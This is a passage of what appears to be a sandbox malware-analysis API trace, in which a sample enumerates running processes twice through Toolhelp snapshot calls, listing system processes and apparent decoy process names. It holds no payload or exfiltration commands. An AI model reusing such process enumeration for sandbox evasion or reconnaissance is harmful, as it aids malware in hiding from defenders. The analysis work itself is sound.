pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.285] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.292] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) 
returned 1 [0101.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="marble.exe")) returned 1 [0101.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.365] CloseHandle (hObject=0xc4) returned 1 [0101.365] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.370] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.371] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.446] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.449] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.451] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.452] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.454] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.464] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
